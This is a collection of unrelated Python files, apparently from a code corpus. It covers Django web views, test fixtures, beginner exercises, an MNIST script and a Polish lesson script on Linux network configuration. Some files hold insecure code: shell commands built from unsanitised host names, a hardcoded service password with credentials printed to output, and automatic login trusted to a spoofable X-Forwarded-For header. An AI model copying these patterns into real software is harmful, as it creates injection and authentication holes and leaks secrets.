return append_imdb_id_to_df(movie).to_json(orient='records')
if __name__ == "__main__":
print(get_rating(12, 862)) |
"""Pytest plugin that mocks subprocess.Popen."""
import subprocess
import pytest
from .creplay import load_log
class PopenController:
"""Controller for mocking subprocess.Popen."""
# Path to the currently active replay log.
log_path = ''
# Set of commands supported by current replay log.
commands = set() # type: ignore
# Strict mode (any command not in the log will cause AssertionError).
strict = True
real_popen = subprocess.Popen
@classmethod
def set_replay_log(cls, log_path, strict=True):
cls.log_path = log_path
cls.commands = set(load_log(log_path))
cls.strict = strict
@classmethod
def set_strict(cls, strict):
cls.strict = strict
@classmethod
def clear_replay_log(cls):
cls.log_path = ''
cls.commands = set()
@classmethod
def popen(cls, cmd, *args, **kw):
cmd_str = ' '.join(cmd)
if cmd_str in cls.commands:
return cls.real_popen(['creplay', '-l', cls.log_path, '--'] + cmd,
*args, **kw)
elif cls.strict:
raise AssertionError('Unexpected command: ' + ' '.join(cmd))
else:
return cls.real_popen(cmd, *args, **kw)
@pytest.fixture
def popen_controller(monkeypatch):
"""Controller for subprocess.Popen."""
monkeypatch.setattr(subprocess, 'Popen', PopenController.popen)
yield PopenController
PopenController.clear_replay_log()
|
# price = 10
# price = 20.44
# name = 'Victor'
# checked = True
# is_published = False
# print(price)
# name = input('What is your name? ')
# print('Hi ' + name)
# from ecommerce.shipping import calc_shipping
# calc_shipping()
from pathlib import Path
# path = Path("ecommerce1")
# print(path.rmdir())
path = Path()
for file in path.glob('*'):
print(file)
|
class Soccer:
def maxPoints(self, wins, ties):
return max(map(lambda (w, t): 3*w + t, zip(wins, ties)))
|
from django.urls import path
from .views import HomeView, ListaErroresView, ConfigurarBaseView, PaletaView
from .views import ColoresView, OtrosView, ConfigurarModeloNuevaView
from .views import EditarReporteView
from .views import ConfigurarUpdateContiguoView, ConfigurarUpdateAbajoView, ConfigurarBorraView, ConfigurarBaseNuevaView
from .views import CrearPasosView
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
crear_patterns = ([
path('crear/',login_required(HomeView.as_view()), name='home'),
path('lista/',login_required(ListaErroresView.as_view()), name='lista'),
path('conf_base/',login_required(ConfigurarBaseView.as_view()), name='conf_base'),
path('conf_base_nueva/',login_required(ConfigurarBaseNuevaView.as_view()), name='conf_base_nueva'),
path('paleta/',login_required(PaletaView.as_view()), name='paleta'),
path('colores/',login_required(ColoresView.as_view()), name='colores'),
path('otros/',login_required(OtrosView.as_view()), name='otros'),
path('conf_modelo/',login_required(ConfigurarModeloNuevaView.as_view()), name='conf_modelo'),
path('conf_update_contiguo/',login_required(ConfigurarUpdateContiguoView.as_view()), name='conf_update_contiguo'),
path('conf_update_abajo/',login_required(ConfigurarUpdateAbajoView.as_view()), name='conf_update_abajo'),
path('conf_borra/',login_required(ConfigurarBorraView.as_view()), name='conf_borra'),
path('crear_pasos/',login_required(CrearPasosView.as_view()), name='crear_pasos'),
path('reporte/<int:pk>/',login_required(EditarReporteView.as_view()), name='reporte'),
], 'crear') |
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 10 22:50:22 2019
@author: anirbanhp
"""
from load_mnist import *
import matplotlib.pyplot as plt
import numpy
from sklearn.neural_network import MLPClassifier
#from keras.layers import Dense
#from keras.models import Sequential
X_train, y_train = load_mnist('training' )
X_test, y_test = load_mnist('testing' )
X_train = np.reshape(X_train, (X_train.shape[0], -1))
X_test = np.reshape(X_test, (X_test.shape[0], -1))
'''
model = Sequential()
model.add(Dense(12, input_dim = 8, activation='relu'))
model.add(Dense(8,activation='relu'))
model.add(Dense(1,activation='sgd'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
data = model.fit(X_train, y_train, validation_split=0.33, epochs= 150, batch_size=10, verbose=0)
print(data.data.keys())
'''
mlp = MLPClassifier(hidden_layer_sizes=(100,), max_iter=10, alpha=1e-4,
solver='sgd', verbose=10, tol=1e-4, random_state=1,
learning_rate_init=.1)
data = mlp.fit(X_train, y_train)
plt.plot(data['loss'])
plt.plot(data['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('iterations')
plt.legend(['train', 'test'], loc='upper left')
plt.show() |
#coding=utf-8
from selenium import webdriver
import time
import os
driver = webdriver.Chrome()
driver.get("http://zpre.cnsuning.com")
driver.find_element_by_link_text("登录").click()
time.sleep(10)
div = driver.find_element_by_class_name("tang-pass-login").find_element_by_name("userName")
div.send_keys("username")
driver.find_element_by_name("password").send_keys("password")
driver.find_element_by_id("TANGRAM__PSP_8__submit").click()
driver.quit()
|
import json
from django.http import HttpResponse
from django.shortcuts import render
# Create your views here.
def index(request):
return render(request, 'demo/index.html')
def deal_get(request):
if request.method == 'GET':
value = request.GET['key1']
context = {'key': value, 'method': 'get'}
return HttpResponse(json.dumps(context))
def deal_post(request):
if request.method == 'POST':
value = request.POST['key1']
context = {'key': value, 'method': 'post'}
return HttpResponse(json.dumps(context))
|
"""
Generate Phone Number w/Area Code
For each person in the dictionary below, insert a
randomly generated phone number. Make sure to use
these SPECS:
- Should be a string in this format: 1-718-786-2825
- Must randomly choose one of these area codes: 646, 718, 212
Hint: Another function from the random module might be useful
"""
from random import choice, randint
people = {
'Melody': '1-',
'Sergei': '1-',
'Brandon': '1-',
'Leo': '1-',
'Priscilla': '1-'
}
for name, num in people.items():
num += choice(['646', '718', '212'])
num += f"-{randint(100,999)}-{randint(1000,9999)}"
#people[name] = (num)
people.update({name:num})
print(f'{name}: {num}')
|
# Copyright (c) 2020-2021 Matematyka dla Ciekawych Świata (http://ciekawi.icm.edu.pl/)
# Copyright (c) 2020-2021 Robert Ryszard Paciorek <rrp@opcode.eu.org>
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
try: clipData
except NameError: clipData = []
code_ipa_output=r"""1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether f4:13:04:4e:17:e8 brd ff:ff:ff:ff:ff:ff
inet 192.168.6.3/24 brd 192.168.6.255 scope global dynamic eth0
valid_lft 63549sec preferred_lft 63549sec
inet6 2001:0db8::6411:f613:4ff:fe4e:17e8/64 scope global dynamic mngtmpaddr
valid_lft 1775sec preferred_lft 575sec
inet6 fe80::f613:4ff:fe4e:17e8/64 scope link
valid_lft forever preferred_lft forever
"""
code_ipa_output2=r"""1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether f4:13:04:4e:17:e8 brd ff:ff:ff:ff:ff:ff
inet 192.168.6.3/24 brd 192.168.6.255 scope global dynamic eth0
valid_lft 63549sec preferred_lft 63549sec
inet 10.0.71.113/20 scope global enp1s0
valid_lft forever preferred_lft forever
inet6 2001:0db8::6411:f613:4ff:fe4e:17e8/64 scope global dynamic mngtmpaddr
valid_lft 1775sec preferred_lft 575sec
inet6 fe80::f613:4ff:fe4e:17e8/64 scope link
valid_lft forever preferred_lft forever
"""
code_ipr_output2=r"""default via 192.168.6.1 dev eth0
10.0.64.0/20 dev eth0 proto kernel scope link src 10.0.1.0
192.168.6.0/24 dev eth0 proto kernel scope link src 192.168.6.3
"""
clipData += [
{ 'title': [ "#11.3", "Konfiguracja", "sieci", "" ] },
{ 'comment': 'konfiguracja - ip ifconfig ...' },
{
'image': [
[0.0, eduMovie.convertFile('polecenie_ip_1.tex', negate=True)],
],
'text' : [
'Obecnie podstawową komendą służącą do konfiguracji interfejsów sieciowych <m> w systemach Linux, ale niekoniecznie w innych Unix’ach jest polecenie ip. <m>'
'Komenda ta przyjmuje w linii poleceń ciągi argumentów określające <m> jakie akcje ma wykonać i na jakim zbiorze ustawień ma je wykonać. <m>'
'Pierwszy argument określa właśnie ten zbiór i mogą to być ustawienia <m> takie jak adresy, trasy routingowe, interfejsy L2, interfejsy tunelowe, <itd>[i te de]. <m>'
'Domyślnym działaniem, jeżeli ciąg argumentów zakończymy na określeniu <m> tego zbioru, jest wypisanie informacji na temat wskazanego zbioru. <m>'
]
},
{
'console': [
[0.0, eduMovie.prompt()],
[0.058368, "o", "i"],
[0.314328, "o", "p"],
[0.690461, "o", " "],
[0.978361, "o", "a"],
[1.298309, "o", "d"],
[1.45029, "o", "d"],
[1.738358, "o", "r"],
[2.12497, "o", "\n\r" + eduMovie.markLines(code_ipa_output, edit=False)],
[2.126245, "o", eduMovie.prompt()],
["ipa_eth1", "o", eduMovie.editBegin(7) + " link/ether " + eduMovie.markBegin + "f4:6d:04:4e:ad:e8" + eduMovie.markEnd + " brd ff:ff:ff:ff:ff:ff" + eduMovie.editEnd(7)],
["ipa_eth2", "o", eduMovie.editBegin(7) + " link/ether f4:6d:04:4e:ad:e8 brd " + eduMovie.markBegin + "ff:ff:ff:ff:ff:ff" + eduMovie.markEnd + eduMovie.editEnd(7)],
["ipa_inet1", "o", eduMovie.editBegin(7) + " link/ether f4:6d:04:4e:ad:e8 brd ff:ff:ff:ff:ff:ff" + eduMovie.editEnd(7)],
["ipa_inet1", "o", eduMovie.editBegin(6) + " " + eduMovie.markBegin + "inet" + eduMovie.markEnd + " 192.168.6.3/24 brd 192.168.6.255 scope global dynamic eth0" + eduMovie.editEnd(6)],
["ipa_inet2", "o", eduMovie.editBegin(6) + " inet " + eduMovie.markBegin + "192.168.6.3/24" + eduMovie.markEnd + " brd 192.168.6.255 scope global dynamic eth0" + eduMovie.editEnd(6)],
["ipa_inet3", "o", eduMovie.editBegin(6) + " inet 192.168.6.3/24 brd " + eduMovie.markBegin + "192.168.6.255" + eduMovie.markEnd + " scope global dynamic eth0" + eduMovie.editEnd(6)],
["ipa_inet4", "o", eduMovie.editBegin(6) + " inet 192.168.6.3/24 brd 192.168.6.255 scope global dynamic eth0" + eduMovie.editEnd(6)],
["ipa_inet6", "o", eduMovie.editBegin(4) + " " + eduMovie.markBegin + "inet6" + eduMovie.markEnd + " 2001:0db8::6411:f66d:4ff:fe4e:ade8/64 scope global dynamic mngtmpaddr" + eduMovie.editEnd(4)],
["ipa_inet7", "o", eduMovie.editBegin(4) + " inet6 " + eduMovie.markBegin + "2001:0db8::6411:f66d:4ff:fe4e:ade8/64" + eduMovie.markEnd + " scope global dynamic mngtmpaddr" + eduMovie.editEnd(4)],
["ipa_inet8", "o", eduMovie.editBegin(4) + " inet6 2001:0db8::6411:f66d:4ff:fe4e:ade8/64 scope global dynamic mngtmpaddr" + eduMovie.editEnd(4)],
["ipa_inet8", "o", eduMovie.clear + eduMovie.prompt() + "ip addr\n\r" + eduMovie.markLines(code_ipa_output, [10, 12], edit=False) + eduMovie.prompt()],
["ipa_local", "o", eduMovie.clear + eduMovie.prompt() + "ip addr\n\r" + eduMovie.markLines(code_ipa_output, [12], edit=False) + eduMovie.prompt()],
["ipa_global", "o", eduMovie.clear + eduMovie.prompt() + "ip addr\n\r" + eduMovie.markLines(code_ipa_output, [10], edit=False) + eduMovie.prompt()],
["ipa_updown1", "o", eduMovie.clear + eduMovie.prompt() + "ip addr\n\r" + eduMovie.markLines(code_ipa_output, [6], edit=False) + eduMovie.prompt()],
["ipa_updown2", "o", eduMovie.clear + eduMovie.prompt() + "ip addr\n\r" + eduMovie.markLines(code_ipa_output, edit=False) + eduMovie.prompt()],
["ipa_updown2", "o", eduMovie.editBegin(9) + "2: eth0: <BROADCAST,MULTICAST," + eduMovie.markBegin + "UP,LOWER_UP" + eduMovie.markEnd + "> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000" + eduMovie.editEnd(8)],
["ipa_updown3", "o", eduMovie.editBegin(9) + "2: eth0: <BROADCAST,MULTICAST," + eduMovie.markBegin + "UP" + eduMovie.markEnd + ",LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000" + eduMovie.editEnd(8)],
["ipa_updown4", "o", eduMovie.editBegin(9) + "2: eth0: <BROADCAST,MULTICAST,UP," + eduMovie.markBegin + "LOWER_UP" + eduMovie.markEnd + "> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000" + eduMovie.editEnd(8)],
["ipa_add", "o", eduMovie.editBegin(9) + "2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000" + eduMovie.editEnd(8)],
["ipa_add", "o", eduMovie.prompt() + "sudo ip addr add 10.0.71.113/20 dev eth0"],
["ipa_add + 2.3", "o", "\n\r" + eduMovie.prompt()],
["ipa_add + 2.5", "o", "\n\r" + eduMovie.prompt()],
["ipa_add + 3.3", "o", "ip addr"],
["ipa_add + 3.9", "o", "\n\r" + eduMovie.markLines(code_ipa_output2 + eduMovie.prompt(), edit=False)],
["ipa_del", "o", eduMovie.prompt() + "sudo ip addr del 10.0.71.113/20 dev eth0"],
["ipa_delX", "o", "^C\n\r" + eduMovie.prompt()],
["ipr", "o", "ip route"],
["ipr + 1.82497", "o", "\n\r" + eduMovie.markLines(code_ipr_output2 + eduMovie.prompt(), edit=False)],
["automatycznatrasa", "o", eduMovie.markLines(code_ipr_output2 + eduMovie.prompt(), [1])],
#["automatycznatrasa2", "o", eduMovie.markLines(eduMovie.runCommandString(r"sipcalc 10.0.71.113/20"), [11], edit=False)]
],
'text' : [
'Polecenie ip address, ip addr lub jeszcze krócej ip a wypisze informację <m> na temat adresów na poszczególnych interfejsach. <m>'
'Warto wspomnieć o tym jakie informacje podało nam takie wywołanie polecenia ip. <m>'
'Widzimy <mark name="ipa_eth1" /> adres <ethernetowy>[eternetowy] wraz z <mark name="ipa_eth2" /> <ethernetowym>[eternetowym] adresem rozgłoszeniowym. <m>'
'<mark name="ipa_inet1" />Jako inet podawany <mark name="ipa_inet2" /> jest adres IPv4 wraz z długością prefixu <mark name="ipa_inet3" />'
'oraz adresem rozgłoszeniowym <mark name="ipa_inet4" /> oraz dodatkowymi informacjami o tym adresie. <m>'
'<mark name="ipa_inet6" /> Jako <inet6>[inet sześć] podawany <mark name="ipa_inet7" /> jest adres IPv6 wraz z długością prefixu. <mark name="ipa_inet8" />'
'Widzimy że mamy dwa adresy IPv6 – jeden z nich rozpoczyna się <mark name="ipa_local" /> od prefiksu fe80 i jest adresem link-local, <m>'
'co zresztą sama komenda ip nam zaznacza pisząc <"scope link">[skołp link], <mark name="ipa_global" /> drugi jest już standardowym routowalnym adresem IPv6 o zasięgu globalnym, czyli <"scope global">[skołp global]. <mark name="ipa_updown1" />'
'Wynik komendy również podaje także pewne informacje <m> na temat interfejsu warstwy niższej, najbardziej użytecznymi są informacje <mark name="ipa_updown2" /> up / down, lower up / lower down. <mark name="ipa_updown3" />'
'Pierwsze z nich odnoszą się do konfiguracyjnego <m> włączenia / wyłączenia interfejsu sieciowego. <mark name="ipa_updown4" />'
'Lower up lub down informuje nas o tym czy dostępne jest medium transmisyjne <m> na którym warstwa niższa funkcjonuje, czy też nie jest dostępne. <m>'
'Na przykład jeżeli w przypadku interfejsu przewodowego wyjmiemy kabel <m> <ethernetowy>[eternetowy] to pojawi się tutaj lower down. <mark name="ipa_add" />'
'Jeżeli polecenie to rozbudujemy do postaci ip address add <m> lub krócej ip <break time="80ms"/> a <break time="100ms"/> a, to będziemy mogli użyć go do dodania <m> wskazanego adresu na wskazany po nim interfejs. <m>'
'Oczywiście działania inne niż wyświetlanie jakiś informacji, <m> będą wymagały stosownych uprawnień, najczęściej uprawnień <root’a>[ruta]. <m>'
'Na pojedynczym interfejsie może być skonfigurowanych wiele różnych adresów. <mark name="ipa_del" />'
'W podobny sposób, pisząc ip address del, możemy usuwać adresy z interfejsu, <mark name="ipa_delX" /> ale nie róbmy tego jeszcze w tej chwili. <mark name="ipr" />'
'Output polecenia ip route znany nam jest już <m> z omawiania zagadnień związanych z tablicą routingu, <m> bo właśnie informacje na jej temat wypisuje to polecenie. <m>'
'Domyślnie wypisuje tablicę dla IPv4, <m> aby uzyskać tablicę dla IPv6 należy dodać opcję -6. <m>'
'Tutaj także, podobnie jak w ip a, możemy skrócić route do litery r <m> i możemy także dodawać i usuwać trasy routingowe. <m>'
'Dzięki temu że nie usunęliśmy jeszcze dodanego niedawno adresu, <mark name="automatycznatrasa" />'
'widzimy iż z każdym adresem ustawionym na interfejsie <m> wiąże się trasa routingowa do sieci w której znajduje się ten adres. <mark name="automatycznatrasa2" />'
'Sieć ta jest zdefiniowana przez prefix określony w tym adresie, <m> o długości podanej przy jego ustawianiu na danym interfejsie. <m> '
]
},
{
'image': [
[0.0, eduMovie.convertFile('polecenie_ip_2.tex', negate=True)],
["slajd2", eduMovie.convertFile('polecenie_ip_3.tex', negate=True)],
],
'text' : [
'Polecenie ip link wypisze nam informacje o interfejsach L2, <m> z odpowiednimi wywołaniami umożliwia włączanie i wyłączanie takich interfejsów, <m> zmienianie adresów L2, konfiguracje <VLANów>[vi lanów] tagowanych. <m>'
'Włączenie, wyłączenie interfejsu odbywa się za pomocą poleceń <m> up i down wykonanych na wskazanym interfejsie. <m>'
'Konfiguracja <VLANów>[vi lanów] polega na utworzeniu interfejsu typu <VLAN>[vi lan] <m> z określonym id (czyli tym <12>[dwunasto] bitowym numerem <VLANu>[vi lanu]) <m> na danym interfejsie sieciowym. <m>'
'Typowo interfejsy związane z <VLANami>[vi lanami] nazywa się od nazwy interfejsu bazowego <m> dodając do niej po kropce numer wskazanego <VLANu>[vi lanu], ale jest to jedynie konwencja. <mark name="slajd2" />'
'Ponadto polecenie to pozwala utworzyć programowy <m> (czyli realizowany na poziomie systemu operacyjnego) <m> switch złożony z kilku interfejsów sieciowych. <m>'
'W tym celu należy utworzyć interfejs typu bridge <m> i następnie dodać do niego interfejsy wchodzące w skład takiego switcha, <m> tak jak pokazano na ekranie. <m>'
"Do zarządzania switch'ami programowymi przydatne może być też polecenie bridge. <m>"
'Polecenie ip umożliwia też konfigurowanie, wspomnianych przy omawianiu sieci ethernet, <m> <trunków>[tranków] złożonych z kilku interfejsów sieciowych. <m>'
"Podobnie jak przy bridge'ach należy tutaj utworzyć interfejs typu bond <m> i dodać do niego odpowiednie interfejsy składowe. <m>"
]
},
{
'image': [
[0.0, eduMovie.convertFile('polecenie_ip_old_new.tex', negate=True)],
],
'text' : [
'Na wielu systemach nadal są dostępne klasyczne komendy <m> służące konfiguracji sieci takie jak: ifconfig <m> (który odpowiada za funkcjonalność ip address <m> oraz włączanie i wyłączanie interfejsów), <m>'
'route (który odpowiada za obsługę tablic routingu), <m> <vconfig>[V config] (do konfiguracji <VLANów>[vi lanów]), <m> <brctrl>[BR ctrl] (do konfiguracji bridge) i ifenslave (do konfiguracji bondów). <m>'
'Warto jednak mieć świadomość istnienia komend ifconfig oraz route, <m> ponieważ na wielu innych systemach uniksowych w ten sposób konfiguruje się sieć, <m> jednak składnia tych komend jest różna na różnych systemach. <m>'
'Natomiast w Linuxach całość funkcjonalności tych poleceń przejęta została <m> przez komendę ip i również coraz częściej polecenia te nie są <m> standardowo instalowane na nowych systemach. <m>'
]
},
{
'image': [
[0.0, eduMovie.convertFile('polecenie_tc_i_wifi.tex', negate=True)],
],
'text' : [
'Innym poleceniem związanym z konfiguracją sieci, <m> którego szczegółowo nie będziemy omawiać, <m> jest tc od Traffic Control. <m>'
'Umożliwia ono konfigurację ustawień kontroli przepływu <m> - na przykład kolejkowania, związanych z tym prędkości ruchu i tak dalej <m> na poszczególnych interfejsach sieciowych. <m>'
'Przydatny jest jeżeli nasz Linux ma pełnić funkcje routingowe <m> i mamy potrzebę na przykład regulacji bądź ograniczenia <m> przepustowości na konkretnych interfejsach. <m>',
"Należy wspomnieć także o narzędziach używanych do konfiguracji sieci bezprzewodowych takich jak <m>"
"<iwconfig>[I W config] obsługujący podstawowe operacje na interfejsie bezprzewodowym, <m>"
"<iwlist>[I W list] służący do listowania widocznych sieci i informacji o nich <m>"
"oraz <wpa_supplicant>[W P A supplicant] służący do łączenia się z sieciami zabezpieczonymi WPA. <m>"
"Możliwe jest też uczynienie z komputera z linuxem i kartą wi-fi <m> access <pointa>[pojta] przy pomocy programu <hostapd>[host A P D]. <m>"
"Jeżeli chcemy oferować DHCP i DNS przyda się także <dnsmasq>[DNS mask]. <m>"
'Konfiguracja interfejsów dokonywana poleceniami ip, <m> jego klasycznymi odpowiednikami, poleceniem tc i innymi tego typu komendami <m> jest konfiguracją typu <run-time>[rantajm], czyli jest tracona po wyłączeniu systemu. <m>'
'W związku z tym polecenia te często zapisywane są w postaci plików, <m> będących skryptami powłoki uruchamianymi w trakcie startu systemu operacyjnego. <m>'
'A jeszcze częściej wykorzystywane są pliki konfiguracyjne <m> (specyficzne dla danej rodziny dystrybucji Linuxa), <m>'
"które są <parsowane>[pars'owane] przez skrypty uruchomieniowe celem wykonania <m> w oparciu o ich treść odpowiedniej konfiguracji interfejsów. <m>",
]
},
]
|
import platform
import subprocess
def check_os():
if platform.system().lower() != "linux":
print "The script you're trying to run is for Linux only"
quit()
def ssh_available(host):
command = "nmap %s" % host
process = subprocess.check_output(command, shell = True)
if "ssh" in process:
return True
else:
print "ssh is not running on", host
return False
def host_is_pingable(host):
command = "ping -c 2 %s" % host
if subprocess.call(command, shell=True,
stdout = open("/dev/null", "w"),
stderr = subprocess.STDOUT) == 0:
return True
else:
print host, "is DOWN"
return False
def util_finder(util, ssh):
util_dest = ""
stdin, stdout, stderr = ssh.exec_command("which %s" % util)
for line in stdout:
util_dest = line.rstrip()
return util_dest
|
from django.shortcuts import render, redirect
from django.urls import reverse, reverse_lazy
from django.contrib import messages
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView, View, TemplateView
from django.contrib.auth.views import LoginView, LogoutView
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth import authenticate, login
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect
from django.core.exceptions import ObjectDoesNotExist
from django.utils.datastructures import MultiValueDictKeyError
from .models import *
from .forms import *
import transliterate
import requests
import os
import sys
import locale
# Create your views here.
def home(request):
list_cameras = Cameras.objects.all()
context = {
'list_cameras':list_cameras
}
template = 'index.html'
def get_client_ip(request):
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
else:
ip = request.META.get('REMOTE_ADDR')
return ip
# Забираем IP клиента и авторизируем если находим в базе
if request.user == AnonymousUser():
try:
ip = get_client_ip(request)
user = CustomUser.objects.get(ip_address=ip) #<-- Проверяет входит ли ip тот что мы получили
login(request,user)
return render(request, template, context)
except ObjectDoesNotExist:
return render(request, template, context)
else:
return render(request, template, context)
class DVR(DetailView):
model = Cameras
template_name = 'cameras/detail.html'
context_object_name = 'get_cameras'
class CustomSuccessMessageMixin:
@property
def success_msg(self):
return False
def form_valid(self,form):
messages.success(self.request, self.success_msg)
return super().form_valid(form)
def get_success_url(self):
return '%s?id=%s' % (self.success_url, self.object.id)
#Камеры
class AddCamera(CustomSuccessMessageMixin, CreateView):
model = Cameras
template_name = 'cameras/cameras.html'
form_class = CameraForm
success_url = reverse_lazy('cameras')
success_msg = 'Камера добавлена'
def get_context_data(self,**kwargs):
kwargs['list_cameras'] = Cameras.objects.all().order_by('title')
return super().get_context_data(**kwargs)
def post(self, request, *args, **kwargs):
form = self.form_class(request.POST)
if form.is_valid():
model = Storage, Settings
for e in Settings.objects.filter(id=1):
a = e.user_f
b = e.pass_f
c = e.port_f
slug = transliterate.translit(request.POST['title'].lower().replace(' ', '_'), reversed=True)
url = request.POST['url']
dvr = request.POST['dvr']
auth =(str(a),str(b))
title = transliterate.translit(request.POST['title'], reversed=True)
try:
path = Storage.objects.get(id=int(request.POST['storage']))
data = 'stream '+ str(slug) +' { title "'+ str(title) +'"; url '+ str(url) +' aac=true; dvr '+ str(path) + ' '+ str (dvr) +' ; }'
except MultiValueDictKeyError:
data = 'stream '+ str(slug) +' { title "'+ str(title) +'"; url '+ str(url) +' aac=true; }'
response = requests.post('http://localhost:'+ str(c) +'/flussonic/api/config/stream_create', data=data, auth=(auth))
view = form.save()
view.save()
print(auth)
return HttpResponseRedirect('/cameras')
return render(request, self.template_name, {'form': form})
class UpdateCamera(CustomSuccessMessageMixin,View):
model = Cameras
template_name = 'cameras/cameras.html'
form_class = CameraForm
success_url = reverse_lazy('cameras')
success_msg = 'Камера успешно обновлена'
def get(self,request, slug):
cam = Cameras.objects.get(slug__iexact=slug)
form = CameraForm(instance=cam)
template = 'cameras/editcam.html'
context = {
'form': form,
'cam': cam
}
return render(request, template, context)
def post(self, request, slug):
cam = Cameras.objects.get(slug__iexact=slug)
form = CameraForm(request.POST, instance=cam)
if form.is_valid():
model = Storage, Settings
for e in Settings.objects.filter(id=1):
a = e.user_f
b = e.pass_f
port = e.port_f
name = transliterate.translit(request.POST['title'].lower().replace(' ', '_'), reversed=True)
url = request.POST['url']
date = request.POST['dvr']
title = transliterate.translit(request.POST['title'], reversed=True)
auth = str(a),str(b)
try:
path = Storage.objects.get(id=int(request.POST['storage']))
data = 'stream '+ str(name) +' { title "'+ str(title) +'"; url '+ str(url) +' aac=true; dvr '+ str(path) + ' '+ str (dvr) +' ; }'
except MultiValueDictKeyError:
data = 'stream '+ str(name) +' { title "'+ str(title) +'"; url '+ str(url) +' aac=true; }'
response = requests.post('http://localhost:'+ str(port) +'/flussonic/api/config/stream_create', data=data, auth=auth)
form.save()
return HttpResponseRedirect('/cameras')
return render(request, self.template_name, success_msg, {'form': form})
class DelCamera(View):
model = Cameras
def get(self, request, slug):
cam = Cameras.objects.get(slug__iexact=slug)
template = 'cameras/delete_cam.html'
context = {
'cam': cam
}
return render(request, template, context)
def post(self, request, slug):
cam = Cameras.objects.get(slug__iexact=slug)
data = slug
response = requests.post('http://localhost:8080/flussonic/api/config/stream_delete', data=data, auth=('flussonic', 'Ff61MvET'))
cam.delete()
return redirect(reverse('cameras'))
class myHome(ListView):
model = Cameras
template_name = 'cameras/myhome.html'
context_object_name = 'list_cameras'
#Настройки
class Setting(View):
model = Settings, Storage
def get(self,request, pk=id):
setting = Settings.objects.get(id=1)
storage = Storage.objects.all()
form = SettingsForm(instance=setting)
template = 'settings.html'
context = {
'form': form,
'setting': setting,
'storage': storage
}
return render(request, template, context)
def post(self, request, pk=id):
setting = Settings.objects.get(id=1)
form = SettingsForm(request.POST, instance=setting)
if form.is_valid():
form.save()
return HttpResponseRedirect('/settings/')
return render(request, self.template_name, success_msg, {'form': form})
#Хранилища
class AddStorage(View):
model = Storage
def get(self,request):
form = StorageForm()
template = 'storage/add_stor.html'
context = {
'form': form
}
return render(request,template, context)
def post(self, request):
bound_form = StorageForm(request.POST)
template = 'storage/add_stor.html'
context = {
'form': bound_form
}
if bound_form.is_valid():
bound_form.save()
return redirect(reverse('settings'))
return render(request, template, context)
class DelStorage(View):
model = Storage
def get(self, request, slug):
stor = Storage.objects.get(slug__iexact=slug)
template = 'storage/del_stor.html'
context = {
'stor': stor
}
return render(request, template, context)
def post(self, request, slug):
stor = Storage.objects.get(slug__iexact=slug)
stor.delete()
return redirect(reverse('settings'))
class UpdateStorage(View):
model = Storage
template = 'storage/upd_stor.html'
def get(self,request, slug):
stor = Storage.objects.get(slug__iexact=slug)
form = StorageForm(instance=stor)
template = 'storage/upd_stor.html'
context = {
'form': form,
'stor': stor
}
return render(request, template, context)
def post(self, request, slug):
stor = Storage.objects.get(slug__iexact=slug)
form = StorageForm(request.POST, instance=stor)
if form.is_valid():
form.save()
return HttpResponseRedirect('/settings')
return render(request, self.template_name, success_msg, {'form': form})
#class UpdateStorage(CustomSuccessMessageMixin,View):
# model = Cameras
# template_name = 'cameras.html'
##Login/Logout пользователя
class HydraLoginView(LoginView):
template_name = 'login.html'
form_class = AuthUserForm
success_url = reverse_lazy('home')
def get_success_url(self):
return self.success_url
class HydraLogout(LogoutView):
next_page = reverse_lazy('home')
#группы по анологии с тэгами
class DelGRP(DeleteView):
model = CustomGroup
template_name = 'groups/groups.html'
success_url = reverse_lazy('groups')
success_msg = 'Группа удалена'
def post(self,request,*args,**kwargs):
messages.success(self.request, self.success_msg)
return super().post(request)
class AddGRP(CustomSuccessMessageMixin, CreateView):
model = CustomGroup
template_name = 'groups/groups.html'
form_class = GroupForm
success_url = reverse_lazy('groups')
success_msg = 'Группа добавлена'
def get_context_data(self,**kwargs):
